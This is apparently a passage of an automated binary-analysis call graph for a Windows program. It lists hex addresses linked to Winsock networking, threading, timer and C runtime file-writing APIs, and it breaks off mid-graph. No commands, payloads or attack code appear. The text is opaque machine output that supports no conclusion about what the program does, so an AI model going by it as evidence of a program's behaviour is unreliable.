19677 9fa658 73 API calls 19677->19686 19679 9f4e8d RtlEnterCriticalSection RtlLeaveCriticalSection 19680 9f4e9f RtlEnterCriticalSection RtlLeaveCriticalSection 19679->19680 19680->19686 19681 9fce0c 73 API calls 19681->19686 19686->19675 19686->19676 19686->19677 19686->19679 19686->19680 19686->19681 19687 a01830 2 API calls 19686->19687 19688 9f4100 2 API calls 19686->19688 19689 9f4bed 19686->19689 19713 9f7c57 19686->19713 19717 9fcf3e 19686->19717 19723 9f7c31 19686->19723 19726 9fa8e5 19686->19726 19738 9fa9bd 19686->19738 19687->19686 19688->19686 19690 9f4bf7 __EH_prolog 19689->19690 19691 9f1ba7 209 API calls 19690->19691 19692 9f4c31 19691->19692 19714 9f7c73 19713->19714 19811 9f8fe5 19714->19811 19719 9fcf48 __EH_prolog 19717->19719 19718 9fcf71 19720 9fcfb6 19718->19720 19825 9f87ca 19718->19825 19719->19718 19818 9f9151 19719->19818 19720->19686 19832 9f882b 19723->19832 19727 9fa8ef __EH_prolog 19726->19727 19728 9f7c31 std::bad_exception::bad_exception 60 API calls 19727->19728 19729 9fa90b 19728->19729 19739 9fa9c7 __EH_prolog 19738->19739 19847 9fcfc9 19739->19847 19812 9f8ff5 19811->19812 19819 9f91a9 19818->19819 19821 9f915d 19818->19821 19833 9f88b4 19832->19833 19834 9f8840 19832->19834 19837 9ffa93 std::bad_exception::bad_exception 60 API calls 19833->19837 19835 9f884d 19834->19835 19836 9f8864 19834->19836 19848 9fc43e 60 API calls 19847->19848 19861 a02413 19858->19861 19862 a024d9 std::exception::_Copy_str 59 API calls 19861->19862 19863 9f182a 19862->19863 19863->19449 19870 9fd63d 19864->19870 19867 9fcb90 19879 9fd675 19867->19879 19869 9fa5eb 19869->19455 19873 9fb161 19870->19873 19874 9fb16b __EH_prolog 19873->19874 19875 a02453 std::exception::exception 59 API calls 19874->19875 19876 9fb17c 19875->19876 19877 9f7c31 std::bad_exception::bad_exception 60 API calls 19876->19877 19878 9fa5dd 19877->19878 19878->19867 19880 9fd67f __EH_prolog 19879->19880 19883 9fb559 19880->19883 19882 9fd6b6 Mailbox 19882->19869 19884 9fb563 __EH_prolog 19883->19884 19885 9fb161 std::bad_exception::bad_exception 60 API calls 19884->19885 19886 9fb574 Mailbox 19885->19886 19886->19882 19908 9f353e 19887->19908 19891 9f2ae8 WSASetLastError connect 19890->19891 19892 9f2ad8 19890->19892 19894 9fa43c 69 API calls 19891->19894 19893 a00a50 Mailbox 68 API calls 19892->19893 19896 9f2add 19893->19896 19895 9f2b07 19894->19895 19895->19896 19898 a00a50 Mailbox 68 API calls 19895->19898 19897 a00a50 Mailbox 68 API calls 19896->19897 19899 9f2b1b 19897->19899 19898->19896 19900 a00a50 Mailbox 68 API calls 19899->19900 19902 9f2b38 19899->19902 19900->19902 19904 9f2b87 19902->19904 19968 9f3027 19902->19968 19904->19273 19907 a00a50 Mailbox 68 API calls 19907->19904 19909 9f3548 __EH_prolog 19908->19909 19910 9f3557 19909->19910 19911 9f3576 19909->19911 19912 9f1996 68 API calls 19910->19912 19930 9f2edd WSASetLastError WSASocketA 19911->19930 19929 9f355f 19912->19929 19915 9f35ad CreateIoCompletionPort 19916 9f35db 19915->19916 19917 9f35c5 GetLastError 19915->19917 19919 a00a50 Mailbox 68 API calls 19916->19919 19918 a00a50 Mailbox 68 API calls 19917->19918 19920 9f35d2 19918->19920 19919->19920 19921 9f35ef 19920->19921 19922 9f3626 19920->19922 19923 a00a50 Mailbox 68 API calls 19921->19923 19956 9fde26 19922->19956 19924 9f3608 19923->19924 19938 9f29ee 19924->19938 19927 9f3659 19928 a00a50 Mailbox 68 API calls 19927->19928 19928->19929 19929->19272 19931 a00a50 Mailbox 68 API calls 19930->19931 19932 9f2f0a WSAGetLastError 19931->19932 19933 9f2f41 19932->19933 19934 9f2f21 19932->19934 19933->19915 19933->19929 19935 9f2f3c 19934->19935 19936 9f2f27 setsockopt 19934->19936 19937 a00a50 Mailbox 68 API calls 19935->19937 19936->19935 19937->19933 19939 9f2a0c 19938->19939 19955 9f2aad 19938->19955 19940 9f2a39 WSASetLastError closesocket 19939->19940 19944 a00a50 Mailbox 68 API calls 19939->19944 19942 9fa43c 69 API calls 19940->19942 19941 a00a50 Mailbox 68 API calls 19943 9f2ab8 19941->19943 19946 9f2a51 19942->19946 19943->19929 19945 9f2a21 19944->19945 19960 9f2f50 19945->19960 19948 a00a50 Mailbox 68 API calls 19946->19948 19946->19955 19949 9f2a5c 19948->19949 19951 9f2a7b ioctlsocket WSASetLastError closesocket 19949->19951 19952 a00a50 Mailbox 68 API calls 19949->19952 19954 9fa43c 69 API calls 19951->19954 19953 9f2a6e 19952->19953 19953->19951 19953->19955 19954->19955 19955->19941 19955->19943 19957 9fde30 __EH_prolog 19956->19957 19958 a03a8f _Allocate 60 API calls 19957->19958 19959 9fde44 19958->19959 19959->19927 19961 9f2f5b 19960->19961 19962 9f2f70 WSASetLastError setsockopt 19960->19962 19963 a00a50 Mailbox 68 API calls 19961->19963 19964 9fa43c 69 API calls 19962->19964 19967 9f2a36 19963->19967 19965 9f2f9e 19964->19965 19966 a00a50 Mailbox 68 API calls 19965->19966 19965->19967 19966->19967 19967->19940 19969 9f304d WSASetLastError select 19968->19969 19970 9f303b 19968->19970 19972 9fa43c 69 API calls 19969->19972 19971 a00a50 Mailbox 68 API calls 19970->19971 19974 9f2b59 19971->19974 19973 9f3095 19972->19973 19973->19974 19975 a00a50 Mailbox 68 API calls 19973->19975 19974->19904 19976 9f2fb4 19974->19976 19975->19974 19977 9f2fd5 WSASetLastError getsockopt 19976->19977 19978 9f2fc0 19976->19978 19979 9fa43c 69 API calls 19977->19979 19980 a00a50 Mailbox 68 API calls 19978->19980 19981 9f300f 19979->19981 19983 9f2b7a 19980->19983 19982 a00a50 Mailbox 68 API calls 19981->19982 19981->19983 19982->19983 19983->19904 19983->19907 19991 a15330 19984->19991 19986 9f32b5 RtlEnterCriticalSection 19987 a00a50 Mailbox 68 API calls 19986->19987 19988 9f32d6 19987->19988 19992 9f3307 19988->19992 19991->19986 19994 9f3311 __EH_prolog 19992->19994 19995 9f3350 19994->19995 20004 9f7db5 19994->20004 20008 9f239d 19995->20008 19998 9f3390 20014 9f7d5e 19998->20014 19999 a00a50 Mailbox 68 API calls 20001 9f337c 19999->20001 20003 9f2d39 71 API calls 20001->20003 20003->19998 20007 9f7dc3 20004->20007 20005 9f7e39 20005->19994 20007->20005 20018 9f891a 20007->20018 20012 9f23ab 20008->20012 20009 9f2417 20009->19998 20009->19999 20010 9f23c1 PostQueuedCompletionStatus 20011 9f23da RtlEnterCriticalSection 20010->20011 20010->20012 20011->20012 20012->20009 20012->20010 20013 9f23f8 InterlockedExchange RtlLeaveCriticalSection 20012->20013 20013->20012 20016 9f7d63 20014->20016 20015 9f32ee RtlLeaveCriticalSection 20015->19289 20016->20015 20034 9f1e7f 20016->20034 20019 9f8944 20018->20019 20020 9f7d5e 68 API calls 20019->20020 20021 9f898a 20020->20021 20022 9f89b1 20021->20022 20024 9fa1a7 20021->20024 20022->20005 20025 9fa1c1 20024->20025 20026 9fa1b1 20024->20026 20025->20022 20026->20025 20029 9ffa65 20026->20029 20030 a02413 std::exception::exception 59 API calls 20029->20030 20031 9ffa7d 20030->20031 20032 a0449a __CxxThrowException@8 RaiseException 20031->20032 20033 9ffa92 20032->20033 20035 a00a50 Mailbox 68 API calls 20034->20035 20036 9f1e90 20035->20036 20036->20016 20038 a021bb _LocaleUpdate::_LocaleUpdate 59 API calls 20037->20038 20039 a022d7 20038->20039 20040 a022e5 20039->20040 20044 a022fc 20039->20044 20041 a05d9b _malloc 59 API calls 20040->20041 20042 a022ea 20041->20042 20043 a04e35 __gmtime64_s 9 API calls 20042->20043 20045 a022f5 ___ascii_stricmp 20043->20045 20044->20045 20046 a058ba 66 API calls __tolower_l 20044->20046 20045->19298 20046->20044 20048 a027cb 20047->20048 20049 a05d9b _malloc 59 API calls 20048->20049 20050 a027db _strlen 20048->20050 20051 a027d0 20049->20051 20050->19306 20052 a04e35 __gmtime64_s 9 API calls 20051->20052 20052->20050 20054 9fdf3d __EH_prolog 20053->20054 20055 a03a8f _Allocate 60 API calls 20054->20055 20056 9fdf54 20055->20056 20056->19317 20058 9fa645 GetProcessHeap HeapFree 20057->20058 20058->19323 20080 a09d71 20059->20080 20061 a05e4f 20062 a05e71 20061->20062 20063 a05e5a 20061->20063 20065 a05e76 20062->20065 20074 a05e83 __flsbuf 20062->20074 20064 a05d9b _malloc 59 API calls 20063->20064 20067 a05e5f 20064->20067 20066 a05d9b _malloc 59 API calls 20065->20066 20066->20067 20067->19333 20068 a05f61 20070 a09d95 __write 79 API calls 20068->20070 20069 a05ee7 20071 a05f01 20069->20071 20073 a05f18 20069->20073 20070->20067 20099 a09d95 20071->20099 20073->20067 20127 a0f736 20073->20127 20074->20067 20076 a05ed2 20074->20076 20079 a05edd 20074->20079 20087 a0f6e2 20074->20087 20076->20079 20096 a0f8a5 20076->20096 20079->20068 20079->20069 20081 a09d90 20080->20081 20082 a09d7b 20080->20082 20081->20061 20083 a05d9b _malloc 59 API calls 20082->20083 20084 a09d80 20083->20084 20085 a04e35 __gmtime64_s 9 API calls 20084->20085 20086 a09d8b 20085->20086 20086->20061 20088 a0f6fa 20087->20088 20089 a0f6ed 20087->20089 20092 a0f706 20088->20092 20093 a05d9b _malloc 59 API calls 20088->20093 20090 a05d9b _malloc 59 API calls 20089->20090 20091 a0f6f2 20090->20091 20091->20076 20092->20076 20094 a0f727 20093->20094 20095 a04e35 __gmtime64_s 9 API calls 20094->20095 20095->20091 20097 a089f4 __malloc_crt 59 API calls 20096->20097 20098 a0f8ba 20097->20098 20098->20079 20100 a09da1 __fcloseall 20099->20100 20101 a09dae 20100->20101 20104 a09dc5 20100->20104 20102 a05d67 __lseeki64 59 API calls 20101->20102 20106 a09db3 20102->20106 20103 a09e64 20105 a05d67 __lseeki64 59 API calls 20103->20105 20104->20103 20107 a09dd9 20104->20107 20108 a09dfc 20105->20108 20109 a05d9b _malloc 59 API calls 20106->20109 20110 a09e01 20107->20110 20111 a09df7 20107->20111 20114 a05d9b _malloc 59 API calls 20108->20114 20122 a09dba __fcloseall 20109->20122 20152 a10bc7 20110->20152 20112 a05d67 __lseeki64 59 API calls 20111->20112 20112->20108 20116 a09e70 20114->20116 20115 a09e07 20117 a09e1a 20115->20117 20118 a09e2d 20115->20118 20119 a04e35 __gmtime64_s 9 API calls 20116->20119 20161 a09e84 20117->20161 20121 a05d9b _malloc 59 API calls 20118->20121 20119->20122 20124 a09e32 20121->20124 20122->20067 20123 a09e26 20220 a09e5c 20123->20220 20125 a05d67 __lseeki64 59 API calls 20124->20125 20125->20123 20128 a0f742 __fcloseall 20127->20128 20129 a0f753 20128->20129 20130 a0f76b 20128->20130 20131 a05d67 __lseeki64 59 API calls 20129->20131 20132 a0f810 20130->20132 20137 a0f7a0 20130->20137 20133 a0f758 20131->20133 20134 a05d67 __lseeki64 59 API calls 20132->20134 20135 a05d9b _malloc 59 API calls 20133->20135 20136 a0f815 20134->20136 20147 a0f760 __fcloseall 20135->20147 20138 a05d9b _malloc 59 API calls 20136->20138 20139 a10bc7 ___lock_fhandle 60 API calls 20137->20139 20140 a0f81d 20138->20140 20141 a0f7a6 20139->20141 20142 a04e35 __gmtime64_s 9 API calls 20140->20142 20143 a0f7d4 20141->20143 20144 a0f7bc 20141->20144 20142->20147 20145 a05d9b _malloc 59 API calls 20143->20145 20146 a0f832 __lseeki64_nolock 61 API calls 20144->20146 20148 a0f7d9 20145->20148 20149 a0f7cb 20146->20149 20147->20067 20150 a05d67 __lseeki64 59 API calls 20148->20150 20256 a0f808 20149->20256 20150->20149 20153 a10bd3 __fcloseall 20152->20153 20154 a10c22 RtlEnterCriticalSection 20153->20154 20155 a0882d __lock 59 API calls 20153->20155 20156 a10c48 __fcloseall 20154->20156 20157 a10bf8 20155->20157 20156->20115 20158 a10c10 20157->20158 20159 a0914c __ioinit InitializeCriticalSectionAndSpinCount 20157->20159 20223 a10c4c 20158->20223 20159->20158 20162 a09e91 __write_nolock 20161->20162 20163 a09ed0 20162->20163 20164 a09eef 20162->20164 20195 a09ec5 20162->20195 20166 a05d67 __lseeki64 59 API calls 20163->20166 20169 a09f47 20164->20169 20170 a09f2b 20164->20170 20165 a0448b __atodbl_l 6 API calls 20167 a0a6e5 20165->20167 20168 a09ed5 20166->20168 20167->20123 20171 a05d9b _malloc 59 API calls 20168->20171 20172 a09f60 20169->20172 20227 a0f832 20169->20227 20173 a05d67 __lseeki64 59 API calls 20170->20173 20174 a09edc 20171->20174 20176 a0f6e2 __read_nolock 59 API calls 20172->20176 20177 a09f30 20173->20177 20178 a04e35 __gmtime64_s 9 API calls 20174->20178 20179 a09f6e 20176->20179 20180 a05d9b _malloc 59 API calls 20177->20180 20178->20195 20182 a0a2c7 20179->20182 20186 a05b9a FindHandler 59 API calls 20179->20186 20181 a09f37 20180->20181 20183 a04e35 __gmtime64_s 9 API calls 20181->20183 20184 a0a2e5 20182->20184 20185 a0a65a WriteFile 20182->20185 20183->20195 20187 a0a409 20184->20187 20193 a0a2fb 20184->20193 20188 a0a2ba GetLastError 20185->20188 20197 a0a287 20185->20197 20190 a09f9a GetConsoleMode 20186->20190 20198 a0a414 20187->20198 20213 a0a4fe 20187->20213 20188->20197 20189 a0a693 20189->20195 20196 a05d9b _malloc 59 API calls 20189->20196 20190->20182 20191 a09fd9 20190->20191 20191->20182 20192 a09fe9 GetConsoleCP 20191->20192 20192->20189 20218 a0a018 20192->20218 20193->20189 20194 a0a36a WriteFile 20193->20194 20193->20197 20194->20188 20194->20193 20195->20165 20199 a0a6c1 20196->20199 20197->20189 20197->20195 20200 a0a3e7 20197->20200 20198->20189 20198->20197 20202 a0a479 WriteFile 20198->20202 20203 a05d67 __lseeki64 59 API calls 20199->20203 20204 a0a3f2 20200->20204 20205 a0a68a 20200->20205 20201 a0a573 WideCharToMultiByte 20201->20188 20201->20213 20202->20188 20202->20198 20203->20195 20207 a05d9b _malloc 59 API calls 20204->20207 20206 a05d7a __dosmaperr 59 API calls 20205->20206 20206->20195 20209 a0a3f7 20207->20209 20208 a0a5c2 WriteFile 20212 a0a615 GetLastError 20208->20212 20208->20213 20210 a05d67 __lseeki64 59 API calls 20209->20210 20210->20195 20212->20213 20213->20189 20213->20197 20213->20201 20213->20208 20214 a0ff4a 61 API calls __write_nolock 20214->20218 20215 a10f93 WriteConsoleW CreateFileW __putwch_nolock 20215->20218 20216 a0a101 WideCharToMultiByte 20216->20197 20217 a0a13c WriteFile 20216->20217 20217->20188 20217->20218 20218->20188 20218->20197 20218->20214 20218->20215 20218->20216 20219 a0a196 WriteFile 20218->20219 20236 a0dc88 20218->20236 20219->20188 20219->20218 20255 a10f6d RtlLeaveCriticalSection 20220->20255 20222 a09e62 20222->20122 20226 a08997 RtlLeaveCriticalSection 20223->20226 20225 a10c53 20225->20154 20226->20225 20239 a10e84 20227->20239 20229 a0f842 20230 a0f84a 20229->20230 20231 a0f85b SetFilePointerEx 20229->20231 20233 a05d9b _malloc 59 API calls 20230->20233 20232 a0f873 GetLastError 20231->20232 20235 a0f84f 20231->20235 20234 a05d7a __dosmaperr 59 API calls 20232->20234 20233->20235 20234->20235 20235->20172 20252 a0dc4e 20236->20252 20240 a10e8f 20239->20240 20243 a10ea4 20239->20243 20241 a05d67 __lseeki64 59 API calls 20240->20241 20242 a10e94 20241->20242 20245 a05d9b _malloc 59 API calls 20242->20245 20244 a05d67 __lseeki64 59 API calls 20243->20244 20246 a10ec9 20243->20246 20247 a10ed3 20244->20247 20249 a10e9c 20245->20249 20246->20229 20248 a05d9b _malloc 59 API calls 20247->20248 20250 a10edb 20248->20250 20249->20229 20251 a04e35 __gmtime64_s 9 API calls 20250->20251 20251->20249 20253 a021bb _LocaleUpdate::_LocaleUpdate 59 API calls 20252->20253 20254 a0dc5f 20253->20254 20254->20218 20255->20222 20259 a10f6d RtlLeaveCriticalSection 20256->20259 20258 a0f80e 20258->20147 20259->20258 20260->19337 20262 9fe26d __EH_prolog 20261->20262 20263 a03a8f _Allocate 60 API calls 20262->20263 20264 9fe276 20263->20264 20265 9f1bfa RtlEnterCriticalSection 20264->20265 20267 9fe484 20264->20267 20265->19342 20268 9fe48e __EH_prolog 20267->20268 20271 9f26db RtlEnterCriticalSection 20268->20271 20270 9fe4e4 20270->20265 20272 9f277e 20271->20272 20273 9f2728 CreateWaitableTimerA 20271->20273 20274 9f27d5 RtlLeaveCriticalSection 20272->20274 20277 a03a8f _Allocate 60 API calls 20272->20277 20275 9f275b SetWaitableTimer 20273->20275 20276 9f2738 GetLastError 20273->20276 20274->20270 20275->20272 20278 a00a50 Mailbox 68 API calls 20276->20278 20280 9f278a 20277->20280 20279 9f2745 20278->20279 20315 9f1712 20279->20315 20282 a03a8f _Allocate 60 API calls 20280->20282 20286 9f27c8 20280->20286 20284 9f27a9 20282->20284 20287 9f1cf8 CreateEventA 20284->20287 20321 9f7d36 20286->20321 20288 9f1d23 GetLastError 20287->20288 20289 9f1d52 CreateEventA 20287->20289 20293 9f1d33 20288->20293 20290 9f1d6b GetLastError 20289->20290 20291 9f1d96 20289->20291 20296 9f1d7b 20290->20296 20292 a032fc __beginthreadex 201 API calls 20291->20292 20294 9f1db6 20292->20294 20295 a00a50 Mailbox 68 API calls 20293->20295 20297 9f1e0d 20294->20297 20298 9f1dc6 GetLastError 20294->20298 20299 9f1d3c 20295->20299 20300 a00a50 Mailbox 68 API calls 20296->20300 20301 9f1e1d 20297->20301 20302 9f1e11 WaitForSingleObject FindCloseChangeNotification 20297->20302 20306 9f1dd8 20298->20306 20303 9f1712 60 API calls 20299->20303 20304 9f1d84 20300->20304 20301->20286 20302->20301 20307 9f1d4e 20303->20307 20305 9f1712 60 API calls 20304->20305 20305->20291 20308 9f1ddf 20306->20308 20309 9f1ddc CloseHandle 20306->20309 20307->20289 20310 9f1dee 20308->20310 20311 9f1de9 CloseHandle 20308->20311 20309->20308 20312 a00a50 Mailbox 68 API calls 20310->20312 20311->20310 20313 9f1dfb 20312->20313 20314 9f1712 60 API calls 20313->20314 20314->20297 20316 9f171c __EH_prolog 20315->20316 20317 9f173e 20316->20317 20318 9f1815 Mailbox 59 API calls 20316->20318 20317->20275 20319 9f1732 20318->20319 20324 9fa3d5 20319->20324 20322 9f7d52 20321->20322 20323 9f7d43 CloseHandle 20321->20323 20322->20274 20323->20322 20325 9fa3df __EH_prolog 20324->20325 20332 9fc93a 20325->20332 20329 9fa400 20330 a0449a __CxxThrowException@8 RaiseException 20329->20330 20331 9fa40e 20330->20331 20333 9fb161 std::bad_exception::bad_exception 60 API calls 20332->20333 20334 9fa3f2 20333->20334 20335 9fc976 20334->20335 20336 9fc980 __EH_prolog 20335->20336 20339 9fb110 20336->20339 20338 9fc9af Mailbox 20338->20329 20340 9fb11a __EH_prolog 20339->20340 20341 9fb161 std::bad_exception::bad_exception 60 API calls 20340->20341 20342 9fb12b Mailbox 20341->20342 20342->20338 20354 9f30ae WSASetLastError 20343->20354 20346 9f30ae 71 API calls 20347 9f3c90 20346->20347 20348 9f16ae 20347->20348 20349 9f16b8 __EH_prolog 20348->20349 20350 9f1701 20349->20350 20351 a02413 std::exception::exception 59 API calls 20349->20351 20350->19196 20352 9f16dc 20351->20352 20353 9fa3d5 60 API calls 20352->20353 20353->20350 20355 9f30ce 20354->20355 20356 9f30ec WSAStringToAddressA 20354->20356 20355->20356 20357 9f30d3 20355->20357 20358 9fa43c 69 API calls 20356->20358 20359 a00a50 Mailbox 68 API calls 20357->20359 20360 9f3114 20358->20360 20361 9f30d8 20359->20361 20362 9f3154 20360->20362 20365 9f311e _memcmp 20360->20365 20361->20346 20361->20347 20363 9f3135 20362->20363 20366 a00a50 Mailbox 68 API calls 20362->20366 20364 9f3193 20363->20364 20367 a00a50 Mailbox 68 API calls 20363->20367 20364->20361 20369 a00a50 Mailbox 68 API calls 20364->20369 20365->20363 20368 a00a50 Mailbox 68 API calls 20365->20368 20366->20363 20367->20364 20368->20363 20369->20361 20371 9f3bdd __EH_prolog 20370->20371 20372 9f3bfe htonl htonl 20371->20372 20382 a023f7 20371->20382 20372->19357 20377 9f3c20 __EH_prolog 20376->20377 20378 9f3c41 20377->20378 20379 a023f7 std::bad_exception::bad_exception 59 API calls 20377->20379 20378->19357 20380 9f3c35 20379->20380 20381 9fa58a 60 API calls 20380->20381 20381->20378 20383 a02413 std::exception::exception 59 API calls 20382->20383 20384 9f3bf2 20383->20384 20385 9fa58a 20384->20385 20386 9fa594 __EH_prolog 20385->20386 20393 9fcaad 20386->20393 20390 9fa5af 20391 a0449a __CxxThrowException@8 RaiseException 20390->20391 20392 9fa5bd 20391->20392 20400 a023dc 20393->20400 20396 9fcae9 20397 9fcaf3 __EH_prolog 20396->20397 20403 9fb47f 20397->20403 20399 9fcb22 Mailbox 20399->20390 20401 a02453 std::exception::exception 59 API calls 20400->20401 20402 9fa5a1 20401->20402 20402->20396 20404 9fb489 __EH_prolog 20403->20404 20405 a023dc std::bad_exception::bad_exception 59 API calls 20404->20405 20406 9fb49a Mailbox 20405->20406 20406->20399 20408 9f3755 InterlockedCompareExchange 20407->20408 20409 9f3770 20407->20409 20408->20409 20410 9f3765 20408->20410 20411 a00a50 Mailbox 68 API calls 20409->20411 20412 9f32ab 78 API calls 20410->20412 20413 9f3779 20411->20413 20412->20409 20414 9f29ee 76 API calls 20413->20414 20415 9f378e 20414->20415 20415->19361 20445 a035f0 20416->20445 20418 9f53c8 20418->19374 20419 a03849 20418->20419 20420 a03855 __fcloseall 20419->20420 20421 a03873 20420->20421 20422 a0388b 20420->20422 20424 a03883 __fcloseall 20420->20424 20423 a05d9b _malloc 59 API calls 20421->20423 20587 a09732 20422->20587 20426 a03878 20423->20426 20424->19372 20429 a04e35 __gmtime64_s 9 API calls 20426->20429 20429->20424 20433 a039d3 __fcloseall 20432->20433 20434 a039e7 20433->20434 20435 a039ff 20433->20435 20436 a05d9b _malloc 59 API calls 20434->20436 20437 a039f7 __fcloseall 20435->20437 20438 a09732 __lock_file 60 API calls 20435->20438 20439 a039ec 20436->20439 20437->19374 20441 a03a11 20438->20441 20440 a04e35 __gmtime64_s 9 API calls 20439->20440 20440->20437 20614 a0395b 20441->20614 20446 a035fc __fcloseall 20445->20446 20447 a0360e 20446->20447 20450 a0363b 20446->20450 20448 a05d9b _malloc 59 API calls 20447->20448 20449 a03613 20448->20449 20451 a04e35 __gmtime64_s 9 API calls 20449->20451 20464 a09808 20450->20464 20461 a0361e __fcloseall @_EH4_CallFilterFunc@8 20451->20461 20453 a03640 20454 a03656 20453->20454 20455 a03649 20453->20455 20457 a0367f 20454->20457 20458 a0365f 20454->20458 20456 a05d9b _malloc 59 API calls 20455->20456 20456->20461 20479 a09927 20457->20479 20459 a05d9b _malloc 59 API calls 20458->20459 20459->20461 20461->20418 20465 a09814 __fcloseall 20464->20465 20466 a0882d __lock 59 API calls 20465->20466 20477 a09822 20466->20477 20467 a09896 20509 a0991e 20467->20509 20468 a0989d 20469 a089f4 __malloc_crt 59 API calls 20468->20469 20471 a098a4 20469->20471 20471->20467 20473 a0914c __ioinit InitializeCriticalSectionAndSpinCount 20471->20473 20472 a09913 __fcloseall 20472->20453 20476 a098ca RtlEnterCriticalSection 20473->20476 20474 a088b5 __mtinitlocknum 59 API calls 20474->20477 20476->20467 20477->20467 20477->20468 20477->20474 20499 a09771 20477->20499 20504 a097db 20477->20504 20488 a09944 20479->20488 20480 a09958 20482 a05d9b _malloc 59 API calls 20480->20482 20481 a09aff 20481->20480 20484 a09b5b 20481->20484 20483 a0995d 20482->20483 20485 a04e35 __gmtime64_s 9 API calls 20483->20485 20520 a10770 20484->20520 20487 a0368a 20485->20487 20496 a036ac 20487->20496 20488->20480 20488->20481 20514 a1078e 20488->20514 20493 a108bd __openfile 59 API calls 20494 a09b17 20493->20494 20494->20481 20495 a108bd __openfile 59 API calls 20494->20495 20495->20481 20580 a097a1 20496->20580 20498 a036b2 20498->20461 20500 a09792 RtlEnterCriticalSection 20499->20500 20501 a0977c 20499->20501 20500->20477 20502 a0882d __lock 59 API calls 20501->20502 20503 a09785 20502->20503 20503->20477 20505 a097e9 20504->20505 20506 a097fc RtlLeaveCriticalSection 20504->20506 20512 a08997 RtlLeaveCriticalSection 20505->20512 20506->20477 20508 a097f9 20508->20477 20513 a08997 RtlLeaveCriticalSection 20509->20513 20511 a09925 20511->20472 20512->20508 20513->20511 20523 a107a6 20514->20523 20516 a09ac5 20516->20480 20517 a108bd 20516->20517 20531 a108d5 20517->20531 20519 a09af8 20519->20481 20519->20493 20538 a10659 20520->20538 20522 a10789 20522->20487 20524 a107bb 20523->20524 20530 a107b4 20523->20530 20525 a021bb _LocaleUpdate::_LocaleUpdate 59 API calls 20524->20525 20526 a107c8 20525->20526 20527 a05d9b _malloc 59 API calls 20526->20527 20526->20530 20528 a107fb 20527->20528 20529 a04e35 __gmtime64_s 9 API calls 20528->20529 20529->20530 20530->20516 20532 a021bb _LocaleUpdate::_LocaleUpdate 59 API calls 20531->20532 20533 a108e8 20532->20533 20534 a05d9b _malloc 59 API calls 20533->20534 20537 a108fd 20533->20537 20535 a10929 20534->20535 20536 a04e35 __gmtime64_s 9 API calls 20535->20536 20536->20537 20537->20519 20540 a10665 __fcloseall 20538->20540 20539 a1067b 20541 a05d9b _malloc 59 API calls 20539->20541 20540->20539 20542 a106b1 20540->20542 20543 a10680 20541->20543 20549 a10722 20542->20549 20544 a04e35 __gmtime64_s 9 API calls 20543->20544 20548 a1068a __fcloseall 20544->20548 20548->20522 20558 a08176 20549->20558 20551 a106cd 20554 a106f6 20551->20554 20552 a10736 20552->20551 20553 a02eb4 _free 59 API calls 20552->20553 20553->20551 20555 a10720 20554->20555 20556 a106fc 20554->20556 20555->20548 20579 a10f6d RtlLeaveCriticalSection 20556->20579 20559 a08183 20558->20559 20560 a08199 20558->20560 20561 a05d9b _malloc 59 API calls 20559->20561 20560->20559 20564 a081a0 ___crtIsPackagedApp 20560->20564 20562 a08188 20561->20562 20563 a04e35 __gmtime64_s 9 API calls 20562->20563 20573 a08192 20563->20573 20565 a081b6 MultiByteToWideChar 20564->20565 20566 a081a9 AreFileApisANSI 20564->20566 20568 a081d0 GetLastError 20565->20568 20569 a081e1 20565->20569 20566->20565 20567 a081b3 20566->20567 20567->20565 20571 a05d7a __dosmaperr 59 API calls 20568->20571 20570 a089f4 __malloc_crt 59 API calls 20569->20570 20572 a081e9 20570->20572 20571->20573 20572->20573 20574 a081f0 MultiByteToWideChar 20572->20574 20573->20552 20574->20573 20575 a08206 GetLastError 20574->20575 20576 a05d7a __dosmaperr 59 API calls 20575->20576 20577 a08212 20576->20577 20578 a02eb4 _free 59 API calls 20577->20578 20578->20573 20579->20555 20581 a097b0 20580->20581 20582 a097cf RtlLeaveCriticalSection 20580->20582 20581->20582 20583 a097b7 20581->20583 20582->20498 20586 a08997 RtlLeaveCriticalSection 20583->20586 20585 a097cc 20585->20498 20586->20585 20588 a09742 20587->20588 20589 a09764 RtlEnterCriticalSection 20587->20589 20588->20589 20590 a0974a 20588->20590 20591 a03891 20589->20591 20592 a0882d __lock 59 API calls 20590->20592 20593 a036f0 20591->20593 20592->20591 20594 a0371d 20593->20594 20595 a036ff 20593->20595 20605 a038c3 20594->20605 20595->20594 20596 a0370d 20595->20596 20603 a03737 _memmove 20595->20603 20597 a05d9b _malloc 59 API calls 20596->20597 20598 a03712 20597->20598 20599 a04e35 __gmtime64_s 9 API calls 20598->20599 20599->20594 20600 a05e41 __flsbuf 79 API calls 20600->20603 20602 a09d71 __fflush_nolock 59 API calls 20602->20603 20603->20594 20603->20600 20603->20602 20604 a09d95 __write 79 API calls 20603->20604 20608 a0a72f 20603->20608 20604->20603 20606 a097a1 __fsopen 2 API calls 20605->20606 20607 a038c9 20606->20607 20607->20424 20609 a0a742 20608->20609 20613 a0a766 20608->20613 20610 a09d71 __fflush_nolock 59 API calls 20609->20610 20609->20613 20611 a0a75f 20610->20611 20612 a09d95 __write 79 API calls 20611->20612 20612->20613 20613->20603 20615 a0396a 20614->20615 20616 a0397e 20614->20616 20618 a05d9b _malloc 59 API calls 20615->20618 20617 a0397a 20616->20617 20619 a0a72f __flush 79 API calls 20616->20619 20630 a03a36 20617->20630 20620 a0396f 20618->20620 20621 a0398a 20619->20621 20622 a04e35 __gmtime64_s 9 API calls 20620->20622 20633 a0b1db 20621->20633 20622->20617 20625 a09d71 __fflush_nolock 59 API calls 20626 a03998 20625->20626 20637 a0b066 20626->20637 20628 a0399e 20628->20617 20629 a02eb4 _free 59 API calls 20628->20629 20629->20617 20631 a097a1 __fsopen 2 API calls 20630->20631 20632 a03a3c 20631->20632 20632->20437 20634 a03992 20633->20634 20635 a0b1e8 20633->20635 20634->20625 20635->20634 20636 a02eb4 _free 59 API calls 20635->20636 20636->20634 20638 a0b072 __fcloseall 20637->20638 20639 a0b096 20638->20639 20640 a0b07f 20638->20640 20641 a0b121 20639->20641 20643 a0b0a6 20639->20643 20642 a05d67 __lseeki64 59 API calls 20640->20642 20644 a05d67 __lseeki64 59 API calls 20641->20644 20645 a0b084 20642->20645 20646 a0b0c4 20643->20646 20647 a0b0ce 20643->20647 20648 a0b0c9 20644->20648 20649 a05d9b _malloc 59 API calls 20645->20649 20650 a05d67 __lseeki64 59 API calls 20646->20650 20651 a10bc7 ___lock_fhandle 60 API calls 20647->20651 20652 a05d9b _malloc 59 API calls 20648->20652 20659 a0b08b __fcloseall 20649->20659 20650->20648 20653 a0b0d4 20651->20653 20654 a0b12d 20652->20654 20655 a0b0f2 20653->20655 20656 a0b0e7 